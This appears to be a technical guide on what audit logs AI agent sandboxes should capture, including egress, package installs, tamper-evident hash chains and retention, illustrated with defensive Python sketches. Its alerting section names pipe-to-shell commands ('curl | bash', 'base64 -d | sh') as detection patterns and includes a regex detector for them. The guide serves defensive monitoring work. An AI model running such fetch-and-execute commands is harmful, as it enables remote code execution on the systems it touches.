- Why AI Agent Sandboxes Need Different Audit Logging
- Command and Process Execution Logs
- Filesystem Access Events
- Outbound Network Calls and Egress Logging
- Package Install Events
- Tool Invocations and Results
- Session Lifecycle Events
- Resource Limit Events
- Structured vs Unstructured Log Formats
- Log Integrity and Tamper Evidence
- Audit Log Retention Policies for AI Agent Sandboxes
- Surfacing Logs for Incident Response
- What to Ask Your Sandbox Provider
- Conclusion
- FAQ
Audit logs for AI agent sandboxes must capture command and process execution, file reads and writes, outbound network calls and egress destinations, package install events, tool invocations, model input and output summaries at the session level, resource limit hits, and session lifecycle events. Without that coverage, a security team cannot reconstruct what an agent did, trace a compromise, or satisfy a post-incident review. Gaps in any of these categories leave blind spots that are difficult or impossible to close retroactively.
Why AI Agent Sandboxes Need Different Audit Logging
Traditional server audit logs assume that a human or a deterministic application process triggered each action. AI agents break that assumption. A single prompt can cause a session to install packages, write files, run shell commands, call external APIs, and spawn subprocesses — all within seconds, with no human approval for individual steps.
This changes what an audit log needs to answer. For a traditional server, the question is usually “did an authorized user change this file?” For an agent sandbox, the questions are:
- What did the model decide to execute, and in what order?
- Which shell commands ran, and as which process?
- Did the agent access files it was not expected to touch?
- What left the sandbox over the network, and where did it go?
- Did a package install introduce unexpected code?
- What was the agent doing when it hit a resource limit or was terminated?
A log system that can answer those questions gives security teams the reconstruction capability they need. A log system that cannot leaves incident response guessing.
Command and Process Execution Logs
Process execution is the highest-priority category. Every command the agent runs, whether directly or through a shell subprocess, should produce a log entry that includes: the process name and full argument list, the PID, the parent process and its PID (PPID), the user and effective UID, the working directory, the timestamp with sub-second precision, and the exit code.
Without the argument list, commands like python, curl, or bash are nearly meaningless in a post-incident trace. Without the UID, you cannot tell whether the agent ran with elevated privileges. Without the parent PID chain, you cannot reconstruct nested subprocesses or understand how a command was invoked.
Linux audit subsystems like auditd with appropriate syscall rules (execve, execveat) can capture this at the kernel level inside a microVM guest. Container-based sandboxes can use eBPF-based tracing or seccomp logging as an alternative, though each approach has different coverage and performance tradeoffs. The key requirement from a security team’s perspective is that the log is generated below the application layer — an agent process that controls its own logging cannot be trusted to report its own behavior accurately.
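To illustrate why the parent PID matters, here is a minimal sketch that walks a set of exec events from one process up to the root of the recorded tree. The event shape (`pid`, `ppid`, `cmd`, `args`) and the function name `ancestry` are assumptions made for this example, not the output format of auditd or any specific tracer.

```python
def ancestry(events, pid):
    """Return command lines from `pid` up through its recorded ancestors.

    Assumes PIDs are unique within the session being examined; a real
    implementation would also key on start time to handle PID reuse.
    """
    by_pid = {e["pid"]: e for e in events}
    chain = []
    seen = set()  # guards against a malformed log that contains a cycle
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        event = by_pid[pid]
        chain.append(" ".join([event["cmd"], *event["args"]]))
        pid = event["ppid"]
    return chain


# Hypothetical events for a single session.
events = [
    {"pid": 100, "ppid": 1, "cmd": "bash", "args": ["-c", "run.sh"]},
    {"pid": 101, "ppid": 100, "cmd": "python", "args": ["agent.py"]},
    {"pid": 102, "ppid": 101, "cmd": "curl", "args": ["-s", "https://example.com"]},
]
chain = ancestry(events, 102)
```

If any event in the chain lacks its `ppid`, the walk stops early, which is the reconstruction gap described above.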
Filesystem Access Events
Filesystem audit coverage should log reads, writes, deletes, renames, and mount operations. For each event, the log should include: the operation type, the full path, the process and PID responsible, the UID, and the timestamp.
In practice, logging every file read in a busy sandbox can generate high volume. Security teams often narrow this to sensitive paths — for example, any path under /etc, /root, the agent’s workspace directory, credential file locations, and mounted secrets. Writes and deletes are higher priority than reads for most threat models, but reads of credential or configuration files are worth capturing regardless.
Filesystem events are particularly useful for identifying data exfiltration attempts (large reads followed by outbound network calls), unexpected configuration changes (writes to files the agent should not touch), and cleanup behavior (deletes executed at the end of a session, which may indicate an attempt to hide activity).
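One way to express the narrowing described above is a small filter that always keeps mutating operations and keeps reads only under sensitive prefixes. This is a sketch under assumptions: the prefixes `/workspace` and `/run/secrets` are placeholders for the agent workspace and mounted secrets, and `should_log` is a hypothetical helper, not part of any audit tool.

```python
import posixpath

# Assumed sensitive locations; adjust to the actual sandbox layout.
SENSITIVE_PREFIXES = ("/etc", "/root", "/workspace", "/run/secrets")
# Mutating operations are logged regardless of path.
ALWAYS_LOG_OPS = {"write", "delete", "rename", "mount"}


def should_log(op: str, path: str) -> bool:
    """Decide whether a filesystem event is kept at full fidelity."""
    if op in ALWAYS_LOG_OPS:
        return True
    # Collapse "." and ".." so "/tmp/../etc/shadow" is treated as "/etc/shadow".
    # This does not resolve symlinks; that has to happen where the event is captured.
    normalized = posixpath.normpath(path)
    return any(
        normalized == prefix or normalized.startswith(prefix + "/")
        for prefix in SENSITIVE_PREFIXES
    )
```

Matching on `prefix + "/"` rather than a bare `startswith(prefix)` avoids treating a path such as `/etcetera/file` as if it were under `/etc`.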
Outbound Network Calls and Egress Logging
Egress logging is one of the most commonly underspecified areas in agent sandbox deployments. Many sandboxes log that a network connection was attempted; far fewer log where it went, what protocol was used, and whether it succeeded.
Complete egress log entries should include: the destination IP address and port, the resolved domain name (DNS query and answer), the protocol (TCP, UDP, HTTP, etc.), the bytes transferred in each direction, the process that opened the connection, the UID, and the timestamp.
DNS query logging matters in its own right. A query for an unexpected domain is a signal worth capturing even if the resulting connection is later blocked. DNS over HTTPS can bypass query logging unless the sandbox enforces network policy at a level that intercepts it.
Sandboxes that provide allow-list-based egress controls should log both allowed and blocked connection attempts. A high volume of blocked attempts to unexpected destinations is itself a meaningful security signal.
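A minimal sketch of an egress record that carries the allow-list verdict, so that blocked attempts are logged alongside allowed ones. The field names, the `net.egress` event type, and the example allow-list are assumptions for illustration; the IP address comes from a range reserved for documentation.

```python
from datetime import datetime, timezone

# Assumed allow-list; a real deployment would load this from policy config.
ALLOWED_DOMAINS = {"pypi.org", "files.pythonhosted.org"}


def domain_allowed(domain: str) -> bool:
    """True if the domain is an allow-listed name or a subdomain of one."""
    d = domain.lower().rstrip(".")
    return any(d == a or d.endswith("." + a) for a in ALLOWED_DOMAINS)


def egress_event(session_id, pid, uid, domain, dst_ip, dst_port,
                 protocol, bytes_out=0, bytes_in=0) -> dict:
    """Build one egress log entry; the verdict is recorded either way."""
    return {
        "ts": datetime.now(timezone.utc).isoformat(timespec="milliseconds"),
        "event": "net.egress",
        "session_id": session_id,
        "pid": pid,
        "uid": uid,
        "domain": domain,
        "dst_ip": dst_ip,
        "dst_port": dst_port,
        "protocol": protocol,
        "bytes_out": bytes_out,
        "bytes_in": bytes_in,
        "verdict": "allowed" if domain_allowed(domain) else "blocked",
    }


blocked = egress_event("sess-example", 102, 1000, "unexpected.example",
                       "203.0.113.10", 443, "tcp")
```

Counting `verdict == "blocked"` entries per session then gives the volume signal mentioned above without a separate logging path.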
Package Install Events
Package installs are a high-value audit target because they change the runtime environment in ways that persist for the duration of the session and potentially affect downstream operations. Each install event should capture: the package manager invoked (pip, npm, apt, cargo, etc.), the package name, the requested version, the resolved version, the source URL or registry, the package hash or checksum, the process and UID, and the timestamp.
The source URL matters. A package installed from a private registry, a direct URL, or an unusual mirror is a different risk profile than one installed from the default public registry. The hash matters for post-incident verification — if a package was later found to be malicious, you want to know whether that exact version was installed in a given session.
Sandboxes that block package installs entirely eliminate this risk category but also significantly constrain what agents can do. Most production deployments need a middle path: log everything, allow installs from an approved source list, and flag or block installs from unknown sources.
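The middle path can be sketched as a classifier over install events plus a lookup by hash for post-incident checks. Everything here is illustrative: the event keys (`source_url`, `sha256`, `session_id`), the approved registry list, and both function names are assumptions, not a package manager API.

```python
from urllib.parse import urlparse

# Assumed approved sources; replace with the organization's own list.
APPROVED_REGISTRIES = {"pypi.org", "files.pythonhosted.org", "registry.npmjs.org"}


def classify_install(event: dict) -> str:
    """Return "allow" or "flag" for a logged install event."""
    host = urlparse(event["source_url"]).hostname or ""
    if host not in APPROVED_REGISTRIES:
        return "flag"  # direct URL, unusual mirror, or unknown registry
    if not event.get("sha256"):
        return "flag"  # no checksum means no later verification
    return "allow"


def sessions_with_hash(events, sha256: str) -> list:
    """Which sessions installed the artifact with this exact checksum?"""
    return sorted({e["session_id"] for e in events if e.get("sha256") == sha256})
```

Whether a flagged install is blocked or merely reported is a policy decision; the log entry should be written in both cases.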
Tool Invocations and Results
AI agents typically operate through a tool-call mechanism where the model requests a named action — run code, read file, call API, search the web — and the orchestration layer executes it. These tool invocations sit above the OS level and are application-layer events, but they are important to log because they represent the model’s intent rather than just the system-level consequence.
Tool invocation logs should capture: the tool name, a summary of the input parameters (not the full content if it would include secrets or user PII), the result status (success, error, timeout), the session ID, and the timestamp.
Logging the full input and output of every tool call is useful for debugging but creates privacy and secret-leakage risks. A practical approach is to log tool names and status unconditionally, log input/output summaries at a configurable verbosity level, and provide a way to retrieve full detail for specific sessions during an investigation with appropriate access controls.
The goal is enough signal to reconstruct the agent’s action sequence without creating a log store that itself becomes a high-value target.
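As a rough sketch of the summary approach, the helper below redacts parameters whose names look like secrets and truncates long values before they reach the log. The key list and the names `summarize_params` and `tool_event` are hypothetical, and name-based redaction is only a first line of defense since secrets can also appear inside values.

```python
import json

# Assumed parameter names that should never be logged verbatim.
SECRET_KEYS = {"api_key", "token", "password", "authorization"}


def summarize_params(params: dict, max_len: int = 64) -> dict:
    """Redact secret-looking keys and truncate long values."""
    summary = {}
    for key, value in params.items():
        if key.lower() in SECRET_KEYS:
            summary[key] = "[REDACTED]"
            continue
        text = value if isinstance(value, str) else json.dumps(value, default=str)
        if len(text) > max_len:
            text = text[:max_len] + f"...(+{len(text) - max_len} chars)"
        summary[key] = text
    return summary


def tool_event(session_id: str, tool: str, params: dict, status: str, ts: str) -> dict:
    """Tool name and status are always logged; inputs only as a summary."""
    return {
        "ts": ts,
        "event": "tool.invoke",
        "session_id": session_id,
        "tool": tool,
        "status": status,
        "input_summary": summarize_params(params),
    }
```

Full inputs and outputs, if retained at all, would live in a separate store with tighter access controls and be joined by session ID during an investigation.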
Session Lifecycle Events
Session lifecycle events anchor all other log entries. A session ID that appears in every event type makes it possible to join logs across categories and answer “what happened in this specific run?”
Lifecycle events to log:
| Event | Key fields |
|---|---|
| Session create | session ID, user/tenant ID, template or image name, resource config, timestamp |
| Session start | session ID, host identifier, assigned resource limits, timestamp |
| Session pause | session ID, reason (API call, timeout, autopause), timestamp |
| Session resume | session ID, resuming actor, timestamp |
| Session terminate | session ID, termination reason (normal, timeout, OOM, API call, policy violation), exit status, timestamp |
| Session cleanup | session ID, filesystem state at cleanup (preserved, deleted, snapshot saved), timestamp |
The termination reason is especially useful post-incident. A session that terminated due to a policy violation, an OOM kill, or an unexpected signal rather than a clean exit is worth examining more closely. Sessions that were paused and resumed are worth examining for state continuity — did anything change in the environment between pause and resume?
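The join by session ID can be sketched in a few lines. The event keys, the `session.terminate` event name, and the set of abnormal reasons are assumptions for this example; timestamps are assumed to be ISO 8601 strings in UTC with a fixed format, which is what makes plain string sorting valid.

```python
from collections import defaultdict

# Assumed reason codes that warrant a closer look.
ABNORMAL_REASONS = {"oom", "policy_violation", "signal"}


def timeline_by_session(events) -> dict:
    """Group events from all categories by session ID, ordered by timestamp."""
    sessions = defaultdict(list)
    for event in events:
        sessions[event["session_id"]].append(event)
    for timeline in sessions.values():
        timeline.sort(key=lambda e: e["ts"])  # fixed-format UTC strings sort correctly
    return dict(sessions)


def needs_review(timeline) -> bool:
    """True if the session ended for a reason other than a clean exit."""
    return any(
        e["event"] == "session.terminate" and e.get("reason") in ABNORMAL_REASONS
        for e in timeline
    )
```

An event that arrives without a session ID cannot be placed in any timeline, which is why the ID needs to be present on every event type.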
Resource Limit Events
Resource limit events capture moments when a session hit a configured ceiling and the system took action. These events signal either normal high-load behavior or something more concerning — a runaway process, an unexpected computation burst, or a deliberate attempt to exhaust resources.
Log entries for resource limit events should include: the limit type (CPU throttle, memory OOM, disk quota, network rate limit, timeout), the measured value at the time of the event, the configured limit, the action taken (throttle, kill, warn), the process or session affected, and the timestamp.
OOM kills are particularly worth examining because they may indicate an agent attempting a large computation that was not expected, a package that loaded unexpectedly large data, or a memory leak. CPU throttle events in a session that should only be doing lightweight LLM calls may indicate that something else is running inside the sandbox.
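A resource limit entry with the fields listed above might look like the following sketch. The class name, the enumerated limit types and actions, and the `unit` field are assumptions added for illustration; validating the enumerations at creation time keeps free-text values out of fields that detection rules will filter on.

```python
from dataclasses import dataclass, asdict
from typing import Optional

LIMIT_TYPES = {"cpu_throttle", "memory_oom", "disk_quota", "network_rate", "timeout"}
ACTIONS = {"throttle", "kill", "warn"}


@dataclass(frozen=True)
class ResourceLimitEvent:
    ts: str
    session_id: str
    limit_type: str
    measured: float    # value observed when the limit was hit
    configured: float  # the configured ceiling
    unit: str          # e.g. "MiB" or "seconds"; hypothetical field
    action: str
    pid: Optional[int] = None  # set when a single process is affected

    def __post_init__(self):
        if self.limit_type not in LIMIT_TYPES:
            raise ValueError(f"unknown limit type: {self.limit_type}")
        if self.action not in ACTIONS:
            raise ValueError(f"unknown action: {self.action}")


oom = ResourceLimitEvent(
    ts="2026-06-29T10:04:00.123Z", session_id="sess-example",
    limit_type="memory_oom", measured=2048.0, configured=2048.0,
    unit="MiB", action="kill", pid=4321,
)
record = asdict(oom)  # plain dict, ready to serialize as a structured log line
```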
Structured vs Unstructured Log Formats
Unstructured logs (free-text lines like `2026-06-29 10:04:00 INFO: process python started`) are readable but difficult to query, aggregate, or integrate with a SIEM or alerting pipeline. For audit purposes, they require parsing that breaks when the log format changes.
Structured logs, typically JSON or a common schema format like CEF or OCSF, allow every field to be indexed, queried, and alerted on directly. A structured execve event such as `{"ts": "2026-06-29T10:04:00.123Z", "event": "process.exec", "session_id": "...", "pid": 1234, "ppid": 1, "uid": 0, "cmd": "curl", "args": ["-s", "https://..."], "exit_code": 0}` is immediately queryable by any of its fields.
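The difference shows up as soon as you try to parse both forms. In this sketch the free-text line needs a hand-written regular expression that silently stops matching when the format shifts, while the JSON line needs none. The `session_id` and URL values are placeholders chosen for the example.

```python
import json
import re

UNSTRUCTURED = "2026-06-29 10:04:00 INFO: process python started"
STRUCTURED = (
    '{"ts": "2026-06-29T10:04:00.123Z", "event": "process.exec", '
    '"session_id": "sess-example", "pid": 1234, "ppid": 1, "uid": 0, '
    '"cmd": "curl", "args": ["-s", "https://example.com"], "exit_code": 0}'
)

# The parser is coupled to the exact wording and punctuation of the line.
LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<level>\w+): process (?P<cmd>\S+) started$")


def parse_unstructured(line: str):
    """Return the captured fields, or None if the format has drifted."""
    match = LINE_RE.match(line)
    return match.groupdict() if match else None


def parse_structured(line: str) -> dict:
    """Every field is available by name with its original type."""
    return json.loads(line)


free_text = parse_unstructured(UNSTRUCTURED)
drifted = parse_unstructured("2026-06-29 10:04:00 INFO process python started")
event = parse_structured(STRUCTURED)
```

Here `drifted` is `None` because a single dropped colon defeats the pattern, whereas `event["uid"]` and `event["args"]` are directly usable in a query or alert rule.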
For security teams evaluating a sandbox provider, the key questions are:
- Are logs structured or unstructured?
- What schema or format is used, and is it documented?
- Can logs be streamed in real time to an external SIEM or log aggregation system?
- What is the latency between an event and its availability in the log stream?
Real-time or near-real-time streaming is important for detection use cases. A log that is only available hours after a session ends is useful for incident reconstruction but not for live alerting.
Log Integrity and Tamper Evidence
An audit log that the agent can modify is not an audit log. This is the tamper-evidence requirement: the log must be generated and stored in a way that the agent process cannot alter, delete, or suppress its own entries.
At the implementation level, this typically means:
- Kernel-level log generation (audit subsystem, eBPF) rather than application-level logging inside the sandbox
- Log shipping to an external destination that the sandbox process cannot reach
- Write-once or append-only log storage with no delete API accessible from the sandbox network
- Log entries signed or checksummed on generation so that tampering or truncation is detectable after the fact
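One common way to make tampering detectable is a keyed hash chain, where each entry's MAC covers the previous entry's MAC. The sketch below is an illustration of that technique using Python's standard `hmac` module, not a description of how any particular sandbox signs its logs; it assumes the key is held by the collector outside the sandbox.

```python
import hashlib
import hmac
import json

GENESIS = "0" * 64  # placeholder "previous MAC" for the first entry


def _mac(key: bytes, prev: str, event: dict) -> str:
    # Canonical JSON so the same event always yields the same bytes.
    payload = json.dumps(event, sort_keys=True, separators=(",", ":"))
    return hmac.new(key, (prev + payload).encode(), hashlib.sha256).hexdigest()


def chain_append(log: list, event: dict, key: bytes) -> None:
    """Append an event whose MAC also covers the previous entry's MAC."""
    prev = log[-1]["mac"] if log else GENESIS
    log.append({"event": event, "prev": prev, "mac": _mac(key, prev, event)})


def chain_verify(log: list, key: bytes) -> bool:
    """Detect edited, reordered, or removed entries within the chain."""
    prev = GENESIS
    for entry in log:
        expected = _mac(key, prev, entry["event"])
        if entry["prev"] != prev or not hmac.compare_digest(entry["mac"], expected):
            return False
        prev = entry["mac"]
    return True
```

A chain on its own does not reveal truncation at the tail, since a shortened chain still verifies. Detecting that requires recording the latest MAC or an entry count somewhere the sandbox cannot write.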
For managed sandbox providers, the relevant question is whether the agent’s process has any path to modify log delivery. If logs are written to a file inside the sandbox and then shipped, a sufficiently privileged agent process may be able to interfere with shipping. If logs are generated at the hypervisor or host level and shipped out of band, the agent has no access.
Chain of custody for log data — particularly important for compliance or legal review — requires that the log collection path, storage access controls, and any transformations applied to raw events are documented and auditable themselves.
Audit Log Retention Policies for AI Agent Sandboxes
Retention requirements for AI agent sandbox audit logs depend on the regulatory environment, the risk profile of the workloads, and the incident response timeline the security team needs to support.
Practical starting points for security teams to evaluate:
| Use case | Suggested minimum retention |
|---|---|
| Active incident investigation | Hot/queryable for at least 90 days |
| Post-incident forensics | Available in cold storage for 12–24 months |
| Compliance review (SOC 2, ISO 27001) | Per applicable framework requirements |
| Legal hold | Until explicitly released |
For AI agent workloads, 90 days of hot storage is a meaningful baseline because compromise patterns in autonomous agents may not be discovered immediately — an agent that exfiltrated data during a session three weeks ago may not be identified until a downstream anomaly is noticed.
Volume is a real cost factor. A sandbox running thousands of sessions per day with full execve and network logging can generate significant data. Tiered storage (hot for recent data, warm for medium-term, cold for archival) is a common approach. Compression and event-type filtering (logging only high-priority event types at full fidelity) are also worth considering, with the tradeoff that filtered logs may miss unexpected event types.
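The retention baselines and the volume question can both be sketched in a few lines. The thresholds below take 90 days for hot storage and the upper end of the 12 to 24 month range for cold storage; the function names and the per-event sizes in the usage lines are made-up inputs for illustration, not measurements.

```python
from datetime import datetime, timedelta, timezone

HOT_DAYS = 90
COLD_DAYS = 730  # roughly 24 months


def storage_tier(event_ts: datetime, now: datetime, legal_hold: bool = False) -> str:
    """Pick a storage tier by age; data under legal hold is never expired."""
    age = now - event_ts
    if age <= timedelta(days=HOT_DAYS):
        return "hot"
    if age <= timedelta(days=COLD_DAYS) or legal_hold:
        return "cold"
    return "expired"


def estimate_bytes(sessions_per_day: int, events_per_session: int,
                   bytes_per_event: int, days: int) -> int:
    """Uncompressed volume for a retention window."""
    return sessions_per_day * events_per_session * bytes_per_event * days


now = datetime(2026, 6, 29, tzinfo=timezone.utc)
tier = storage_tier(now - timedelta(days=200), now)
# Hypothetical workload: 1,000 sessions/day, 500 events each, 400 bytes per event.
hot_volume = estimate_bytes(1000, 500, 400, HOT_DAYS)
```

With those assumed inputs the 90-day hot window holds 18,000,000,000 bytes, about 18 GB before compression, which gives a starting point for sizing each tier.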
Surfacing Logs for Incident Response
Collecting logs is necessary but not sufficient. Logs that sit in a bucket nobody queries offer no protection. For security teams, the operational requirement is to be able to answer specific questions quickly:
- What did session X do between time T1 and T2?
- Which sessions accessed path P?
- Which sessions made outbound connections to domain D?
- Which sessions installed package V?
- Which sessions terminated with reason R?
This requires a query interface — either a SIEM integration, a log analytics platform, or a provider-supplied API — where session ID, event type, timestamp range, path, domain, and other key fields are indexed and searchable.
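In production these questions would be SIEM or log analytics queries, but an in-memory sketch shows which fields have to exist and be filterable. The function `sessions_matching` and the event keys are hypothetical; timestamps are assumed to be fixed-format UTC ISO 8601 strings so that string comparison orders them correctly.

```python
def sessions_matching(events, start=None, end=None, **fields) -> list:
    """Return session IDs with at least one event matching all given fields
    inside the optional [start, end] timestamp range."""
    hits = set()
    for event in events:
        if start is not None and event["ts"] < start:
            continue
        if end is not None and event["ts"] > end:
            continue
        if all(event.get(name) == value for name, value in fields.items()):
            hits.add(event["session_id"])
    return sorted(hits)


# Hypothetical events from three sessions.
events = [
    {"session_id": "s1", "ts": "2026-06-29T10:00:00.000Z", "event": "net.egress", "domain": "unexpected.example"},
    {"session_id": "s2", "ts": "2026-06-29T11:00:00.000Z", "event": "fs.read", "path": "/etc/shadow"},
    {"session_id": "s3", "ts": "2026-06-30T09:00:00.000Z", "event": "net.egress", "domain": "unexpected.example"},
]
by_domain = sessions_matching(events, event="net.egress", domain="unexpected.example")
by_path = sessions_matching(events, path="/etc/shadow")
```

Each keyword argument corresponds to a field that needs an index in the real log store; a field that is only present inside a free-text message cannot be queried this way.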
Alerting on specific patterns is the second layer. High-priority signals for AI agent sandboxes include: execution of known-dangerous commands (`curl | bash`, `wget -O - | sh`, `base64 -d | sh`), outbound connections to unexpected or newly registered domains, package installs from non-registry URLs, write events to credential file paths, sessions that terminate with policy violation or OOM kill, and any event occurring under UID 0 when the agent should not be running as root.
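Two of these signals, pipe-to-shell commands and unexpected root activity, can be sketched as simple rules over exec events. The regular expressions, rule names, and event keys are illustrative assumptions and far from exhaustive. Note that a kernel-level exec log records the two sides of a pipeline as separate processes, so this kind of pattern only matches when the pipeline is passed as a string to a shell, for example through `bash -c`.

```python
import re

# Download or decode piped straight into a shell interpreter.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")
BASE64_TO_SHELL = re.compile(
    r"\bbase64\s+(-d|--decode)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"
)


def alerts_for(event: dict, expect_root: bool = False) -> list:
    """Return the names of the rules this event triggers."""
    found = []
    if event.get("event") == "process.exec":
        cmdline = " ".join([event["cmd"], *event.get("args", [])])
        if PIPE_TO_SHELL.search(cmdline) or BASE64_TO_SHELL.search(cmdline):
            found.append("pipe_to_shell")
    if event.get("uid") == 0 and not expect_root:
        found.append("unexpected_root")
    return found


suspicious = {
    "event": "process.exec", "uid": 0, "cmd": "bash",
    "args": ["-c", "curl -s https://example.com/install.sh | bash"],
}
triggered = alerts_for(suspicious)
```

Rules like these are easy to evade with minor obfuscation, so they work best as one input next to the egress and filesystem signals rather than as the only detection layer.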
Pre-built detection rules calibrated for agent sandbox behavior patterns reduce the time to first alert for novel activity. Security teams evaluating sandbox providers should ask whether the provider supplies detection rules, log schema documentation, and sample SIEM integrations, or whether building that layer is left entirely to the customer.
What to Ask Your Sandbox Provider
When evaluating an AI agent sandbox for audit log coverage, these are the concrete questions worth putting to a provider:
- What event categories are logged by default, and what requires configuration?
- Are logs generated at the kernel/hypervisor level, or inside the sandbox process?
- What structured log format is used, and is the schema publicly documented?
- Can logs be streamed in real time to an external destination?
- What is the data retention policy, and can it be extended?
- Does the sandbox process have any path to modify or suppress its own log entries?
- Are log entries signed or otherwise tamper-evident?
- Is there a query API or SIEM integration available?
- Are there pre-built detection rules or alerting templates for common sandbox threat patterns?
No sandbox deployment has complete logging coverage by default. Gaps between what a provider collects and what a security team needs to reconstruct an incident are common. Identifying those gaps before deployment, rather than after an incident, is the practical payoff from this kind of evaluation.
Novita Agent Sandbox provides session lifecycle events, execution logs, and resource metrics accessible through its API. Security teams evaluating Novita Agent Sandbox should verify current log coverage, export options, and retention configuration in the product documentation before making architecture decisions.
Conclusion
Audit logging for AI agent sandboxes is not a feature you can retrofit after an incident. The event categories that matter — process execution, filesystem access, egress traffic, package installs, tool invocations, session lifecycle, and resource limits — need to be in scope before a workload goes into production, and the log collection path needs to be outside the agent’s reach.
The practical checklist for security teams is straightforward: identify which event categories your sandbox provider captures by default, confirm logs are generated at the kernel or hypervisor level rather than inside the agent process, verify that structured output is available for SIEM integration, and establish retention policies before you need them for an investigation.
Gaps in any of these areas are gaps in your ability to answer “what did this agent do?” — and for autonomous agents operating at scale, that question will eventually need an answer.
FAQ
What events should AI agent sandbox audit logs capture?
At minimum: command and process execution (with full argument lists), filesystem reads/writes/deletes, outbound network connections and DNS queries, package install events with source URLs and hashes, tool invocations and result status, session lifecycle events (create, pause, resume, terminate, cleanup), and resource limit events (CPU throttle, OOM kill, timeout). Missing any of these categories leaves blind spots that cannot be filled in after the fact.
Why can’t I rely on application-level logging inside the sandbox?
An agent process that controls its own logging can suppress or modify entries about its own behavior — intentionally or through a bug. Kernel-level collection (via auditd, eBPF, or hypervisor instrumentation) generates log entries below the application layer, where the agent has no write access. This is the tamper-evidence requirement: the log must be generated in a location the agent cannot reach.
How long should AI agent sandbox audit logs be retained?
A practical baseline: 90 days in hot queryable storage for active investigation, 12–24 months in cold storage for post-incident forensics. Compliance frameworks like SOC 2 and ISO 27001 have their own requirements that may supersede these baselines. For legal holds, retention should continue until explicitly released by legal counsel.
What is the difference between structured and unstructured audit logs?
Unstructured logs are free-text lines that require parsing to query. Structured logs use a consistent schema (JSON, CEF, OCSF) where every field is indexed and queryable directly. For security operations, structured logs are significantly easier to integrate with SIEM platforms, write detection rules for, and query during incident response.
Can an AI agent tamper with its own audit logs?
It depends on where logs are generated and stored. If logs are written to a file inside the sandbox and shipped externally, a privileged agent process may interfere with the shipping pipeline. If logs are generated at the hypervisor or host level and written directly to an external destination that the sandbox network cannot reach, the agent has no path to modify them. Always verify the log collection architecture, not just the log format.
What should I look for in a sandbox provider’s audit log documentation?
Confirm: which event categories are logged by default versus requiring configuration; whether logs are generated at the kernel/hypervisor level or inside the sandbox process; what structured format and schema is used; whether real-time streaming to external systems is supported; what the default retention policy is and whether it can be extended; and whether pre-built detection rules or SIEM integrations are available.
